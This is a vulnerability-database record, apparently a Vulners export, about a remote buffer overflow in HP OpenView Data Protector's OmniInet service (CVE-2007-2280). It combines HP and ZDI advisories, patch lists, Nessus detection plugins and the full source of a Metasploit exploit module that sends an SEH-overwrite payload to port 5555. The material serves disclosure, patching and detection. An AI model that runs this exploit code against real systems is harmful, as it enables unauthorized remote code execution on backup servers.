Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "modified": "2009-12-21T00:00:00", "published": "2009-12-21T00:00:00", "id": "SECURITYVULNS:DOC:22980", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22980", "title": "ZDI-09-099: Hewlett-Packard OpenView Data Protector Backup Client Service Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "No description provided", "modified": "2009-12-21T00:00:00", "published": "2009-12-21T00:00:00", "id": "SECURITYVULNS:VULN:10483", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10483", "title": "HP OpenView Storage Data Protector code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01124817\r\nVersion: 1\r\n\r\nHPSBMA02252 SSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-12-16\r\nLast Updated: 2009-12-16\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities 
have been identified with HP OpenView Storage Data Protector running on HP-UX, Windows, Linux and Solaris. These vulnerabilities could be exploited remotely to execute arbitrary code.\r\n\r\nReferences: CVE-2007-2280, CVE-2007-2281\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Data Protector Application Recovery Manager v5.50 and v6.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2007-2280 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2007-2281 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Tenable Network Security working with the TippingPoint Zero Day Initiative and Pedram Amini and Aaron Portnoy, both of TippingPoint DV Labs for reporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following patches to resolve these vulnerabilities.\r\nThe patches are available from the following location\r\n\r\nURL http://itrc.hp.com\r\n\r\nOperating System/Description/Patch ID\r\n\r\nB.11.11, B.11.23, B.11.31 (PA)\r\n OV DP6.0 (Cell Server)\r\n PHSS_36588\r\n\r\nB.11.11, B.11.23, B.11.31 (PA)\r\n OV DP6.0 (Core)\r\n PHSS_36622\r\n\r\nB.11.23, B.11.31 (IA-64)\r\n OV DP6.0 (Cell Server)\r\n PHSS_36589\r\n\r\nB.11.23, B.11.31 (IA-64)\r\n OV DP6.0 (Core)\r\n PHSS_36623\r\n\r\nB.11.11, B.11.23 (PA)\r\n OV DP5.50 (Cell Server)\r\n PHSS_36799\r\n\r\nB.11.11, B.11.23 (PA)\r\n OV DP5.50 (Core)\r\n PHSS_37382\r\n\r\nB.11.23 (IA-64)\r\n OV DP5.50 (Cell Server)\r\n PHSS_36800\r\n\r\nB.11.23 (IA-64)\r\n OV DP5.50 (Core)\r\n PHSS_37383\r\n\r\nSolaris 2.8, 2.9, 2.10\r\n OV DP6.0 (Cell Server)\r\n DPSOL_00290\r\n\r\nSolaris 2.8, 2.9, 2.10\r\n OV DP6.0 (Core)\r\n DPSOL_00294\r\n\r\nSolaris 2.7, 2.8, 2.9\r\n OV DP5.50 (Cell Server)\r\n 
DPSOL_00300\r\n\r\nSolaris 2.7, 2.8, 2.9\r\n OV DP5.50 (Core)\r\n DPSOL_00321\r\n\r\nRedHat 4AS-x86_64, RedHat 4ES-x86_64\r\n OV DP6.0 (Cell Server)\r\n DPLNX_00025\r\n\r\nRedHat 4AS-x86_64, RedHat 4ES-x86_64\r\n OV DP6.0 (Core)\r\n DPLNX_00029\r\n\r\nWindows 2000/2003/XP\r\n OV DP6.0 (Cell Server)\r\n DPWIN_00337\r\n\r\nWindows 2000/2003/XP\r\n OV DP6.0 (Core)\r\n DPWIN_00329\r\n\r\nWindows 2000/2003/XP\r\n OV DP5.50 (Cell Server)\r\n DPWIN_00208\r\n\r\nWindows 2000/2003/XP\r\n OV DP5.50 (Core)\r\n DPWIN_00359\r\n\r\nMANUAL ACTIONS: No\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nFor OV DP6.0, PA-RISC\r\n\r\nHP-UX B.11.11, B.11.23, B.11.31\r\n==================\r\nDATA-PROTECTOR.OMNI-CS\r\naction: install PHSS_36588 or subsequent\r\naction: install PHSS_36622 or subsequent\r\n\r\nFor OV DP6.0, IA-64\r\nHP-UX B.11.23, B.11.31\r\n==================\r\nDATA-PROTECTOR.OMNI-CS\r\naction: install PHSS_36589 or subsequent\r\naction: install PHSS_36623 or subsequent\r\n\r\nFor OV DP5.50, PA-RISC\r\n\r\nHP-UX B.11.11, B.11.23\r\n==================\r\nDATA-PROTECTOR.OMNI-CS\r\naction: install PHSS_36799 or subsequent\r\naction: install PHSS_37382 or subsequent\r\n\r\nFor OV DP5.50, IA-64\r\nHP-UX B.11.23\r\n==================\r\nDATA-PROTECTOR.OMNI-CS\r\naction: install PHSS_36800 or subsequent\r\naction: install PHSS_37383 or subsequent\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion:1 (rev.1) 16 December 2009 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on 
systems running HP software products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 
3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. 
Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkspcYEACgkQ4B86/C0qfVkItgCg9uk6tgF3cfRS7sNf++8iiDZ8\r\n+zkAoLsnNDMz83rozws++rOLuTlz18Y1\r\n=qxAw\r\n-----END PGP SIGNATURE-----", "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "id": "SECURITYVULNS:DOC:22965", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22965", "title": "[security bulletin] HPSBMA02252 SSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:53", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Storage Data Protector. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the backup client service daemon (OmniInet.exe), which binds to TCP port 5555. 
During the processing of long arguments to the 'MSG_PROTOCOL' command, a stack-based buffer overflow occurs and can result in code execution under the context of the daemon.", "modified": "2009-11-09T00:00:00", "published": "2009-12-17T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-09-099", "id": "ZDI-09-099", "title": "Hewlett-Packard OpenView Data Protector Backup Client Service Buffer Overflow Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-12T13:26:46", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). 
However, this module only exploits the first one.\n", "modified": "2017-07-24T13:26:21", "published": "2010-01-06T20:04:58", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_1", "href": "", "type": "metasploit", "title": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). 
However, this module only\n exploits the first one.\n },\n 'Author' =>\n [\n 'EgiX <n0b0d13s[at]gmail.com>',\n 'Fairuzan Roslan <riaf[at]mysec.org>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2007-2280' ],\n [ 'BID', '37396' ],\n [ 'OSVDB', '61206' ],\n [ 'ZDI', '09-099' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 4658+66,\n 'BadChars' => \"\\x00\", # (we don't want \\x00\\x00)\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic Targeting', { 'auto' => true } ],\n\n # DP Targets\n [ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330',\n {\n 'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)\n }\n ],\n [ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',\n {\n 'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)\n }\n ],\n\n # APPRM Targets\n [ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',\n {\n 'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)\n }\n ],\n [ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',\n {\n 'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 17 2009'))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def check\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if (resp)\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n # extract version\n if (resp =~ /HP Data Protector/)\n version = resp.split[3]\n elsif (resp =~ /HP OpenView Storage Data Protector/)\n version = resp.split[5]\n elsif (resp =~ /HP StorageWorks Application Recovery Manager/)\n version = resp.split[5]\n else\n return Exploit::CheckCode::Detected\n end\n\n version = version.split('.')\n major = version[1].to_i\n minor = version[2].to_i\n if ((major < 6) or (major == 6 and minor < 11))\n return 
Exploit::CheckCode::Appears\n end\n\n if ((major > 6) or (major == 6 and minor >= 11))\n return Exploit::CheckCode::Safe\n end\n\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n mytarget = target\n\n if (target['auto'])\n mytarget = nil\n\n print_status(\"Automatically detecting the target...\")\n\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if not resp\n fail_with(Failure::Unknown, \"No version response returned.\")\n end\n\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n self.targets.each do |t|\n if (resp =~ /#{t.name}/) then\n mytarget = t\n break\n end\n end\n\n if (not mytarget)\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n else\n print_status(\"Trying target #{mytarget.name}...\")\n end\n\n # separator between arguments\n sep = [0x2000].pack('N')\n\n # Unicode BOM\n pkt = \"\\xff\\xfe\"\n # MSG_PROTOCOL command\n pkt << Rex::Text.to_unicode(\"267\")\n\n # dunno\n 3.times do\n pkt << sep\n pkt << rand_text_alpha_upper(2)\n end\n\n # culprit string\n pkt << sep\n\n # the payload + seh record\n pkt << payload.encoded\n pkt << generate_seh_record(mytarget.ret)\n\n # jump back\n dist = payload_space + 8\n pkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + dist.to_s).encode_string\n\n # force exception hitting the end of the stack\n pkt << rand_text_alphanumeric(1000) * 25\n\n # 5th arg\n pkt << sep\n pkt << rand_text_alpha_upper(2)\n\n # end marker\n pkt << sep\n\n # packet length\n buff = [pkt.length].pack('N')\n buff << pkt\n\n connect\n print_status(\"Sending MSG_PROTOCOL packet...\")\n sock.put(buff)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_1.rb"}], "nessus": [{"lastseen": 
"2019-12-13T07:50:29", "bulletinFamily": "scanner", "description": "According to its version and build number, the HP Data Protector\napplication running on the remote host is affected by a stack-based\nbuffer overflow condition in the backup client service daemon\n(OmniInet.exe). An unauthenticated, remote attacker can exploit this,\nvia an MSG_PROTOCOL command with long arguments, to corrupt memory,\nresulting in the execution of arbitrary code.", "modified": "2019-12-02T00:00:00", "id": "HP_DATA_PROTECTOR_MSG_PROTOCOL_BOF.NASL", "href": "https://www.tenable.com/plugins/nessus/43635", "published": "2010-01-05T00:00:00", "title": "HP Data Protector OmniInet.exe MSG_PROTOCOL Command RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43635);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2007-2280\");\n script_bugtraq_id(37396);\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"Secunia\", value:\"37845\");\n script_xref(name:\"ZDI\", value:\"ZDI-09-099\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"HPSBMA02252\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n\n script_name(english:\"HP Data Protector OmniInet.exe MSG_PROTOCOL Command RCE\");\n script_summary(english:\"Does a banner check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The backup service running on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version and build number, the HP Data Protector\napplication running on the remote host is affected by a stack-based\nbuffer overflow condition in the backup client service daemon\n(OmniInet.exe). 
An unauthenticated, remote attacker can exploit this,\nvia an MSG_PROTOCOL command with long arguments, to corrupt memory,\nresulting in the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-09-099/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2009/Dec/258\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c01124817\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d59a99f7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patches referenced in the HP advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:storage_data_protector\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:data_protector\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"ssh_get_info.nasl\", \"hp_data_protector_installed.nasl\",\"hp_data_protector_installed_local.nasl\");\n script_require_keys(\"Services/data_protector/version\", \"Services/data_protector/build\");\n script_require_ports(\"Services/hp_openview_dataprotector\", 5555);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nport = get_kb_item(\"Services/hp_openview_dataprotector\");\nif (!port) port = 5555;\nif (!get_port_state(port)) exit(0, \"Port \"+port+\" is not open.\");\n\nversion = get_kb_item_or_exit(\"Services/data_protector/version\");\nbuild = get_kb_item_or_exit(\"Services/data_protector/build\");\n\nif (version == \"unknown\") audit(AUDIT_UNKNOWN_APP_VER, \"HP Data Protector\");\n\n# We need the HP-UX/Solaris version in order to reliably determine whether or\n# not those systems are vulnerable\nhpux_ver = get_kb_item(\"Host/HP-UX/version\");\nsolaris_ver = get_kb_item(\"Host/Solaris/Version\");\nrh_release = get_kb_item(\"Host/RedHat/release\");\nos = get_kb_item(\"Host/OS\");\nvulnerable = FALSE;\n\n# Ignore anything that looks like DP for Unix since it's not mentioned in the\n# advisory\nif ('SSPUX' >< build)\n vulnerable = FALSE;\nelse if (version == \"A.05.50\")\n{\n # unpatched version == build number (only HP-UX, Solaris, and Windows affected)\n if (\n (\n (hpux_ver && (hpux_ver == \"11.11\" || hpux_ver == \"11.23\")) ||\n (solaris_ver && (solaris_ver == \"5.7\" || solaris_ver == \"5.8\" || solaris_ver == \"5.9\")) ||\n (os && 'Windows' >< os)\n ) &&\n egrep (pattern:\"^[0-9]+\", string:build)\n )\n {\n vulnerable = TRUE;\n }\n\n # windows patch name (fixed in DPWIN_00359)\n else if (match = eregmatch(pattern:\"DPWIN_([0-9]+)\", string:build))\n {\n build_num = int(match[1]);\n if (build_num < 359)\n vulnerable = TRUE;\n }\n # HP-UX security 
patch (fixed in PHSS_37382 and PHSS_37383)\n else if (\n hpux_ver &&\n (hpux_ver == \"11.11\" || hpux_ver == \"11.23\") &&\n match = eregmatch(pattern:\"PHSS_([0-9]+)\", string:build)\n )\n {\n build_num = int(match[1]);\n if (build_num < 37382)\n vulnerable = TRUE;\n }\n # solaris security patch (fixed in DPSOL_00321)\n else if (\n solaris_ver &&\n (solaris_ver == \"5.7\" || solaris_ver == \"5.8\" || solaris_ver == \"5.9\") &&\n match = eregmatch(pattern:\"DPSOL_([0-9]+)\", string:build))\n {\n build_num = int(match[1]);\n if (build_num < 321)\n vulnerable = TRUE;\n }\n}\nelse if (version == \"A.06.00\")\n{\n # unpatched version == build number (all platforms affected for 06.00)\n if (egrep (pattern:\"^[0-9]+\", string:build))\n vulnerable = TRUE;\n\n # windows security patch (fixed in DPWIN_00329)\n if (match = eregmatch(pattern:\"DPWIN_([0-9]+)\", string:build))\n {\n build_num = int(match[1]);\n if (build_num < 329)\n vulnerable = TRUE;\n }\n # linux security patch (fixed in DPLNX_00029)\n else if (\n rh_release && 'release 4' >< rh_release &&\n match = eregmatch(pattern:\"DPLNX_([0-9]+)\", string:build)\n )\n {\n build_num = int(match[1]);\n if (build_num < 29)\n vulnerable = TRUE;\n }\n # solaris security patch (fixed in DPSOL_00294)\n else if (\n solaris_ver &&\n (solaris_ver == \"5.8\" || solaris_ver == \"5.9\" || solaris_ver == \"5.10\") &&\n match = eregmatch(pattern:\"DPSOL_([0-9]+)\", string:build)\n )\n {\n build_num = int(match[1]);\n if (build_num < 294)\n vulnerable = TRUE;\n }\n # HP-UX security patch (fixed in PHSS_36622 and PHSS_36623)\n else if (\n hpux_ver &&\n (hpux_ver == \"11.11\" || hpux_ver == \"11.23\" || hpux_ver == \"11.31\") &&\n match = eregmatch(pattern:\"PHSS_([0-9]+)\", string:build)\n )\n {\n build_num = int(match[1]);\n if (build_num < 36622)\n vulnerable = TRUE;\n }\n}\n\nif (vulnerable)\n{\n report = '\\nVersion : '+version+'\\nBuild : '+build+'\\n';\n security_report_v4(severity:SECURITY_HOLE, port:port, 
extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN,\"HP Data Protector\", version, build);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP5.50 PA RISC patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36799.NASL", "href": "https://www.tenable.com/plugins/nessus/43138", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36799 : s700_800 11.X OV DP5.50 PA RISC patch - CS packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36799. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43138);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36799 : s700_800 11.X OV DP5.50 PA RISC patch - CS packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP5.50 PA RISC patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. 
The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36799 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security 
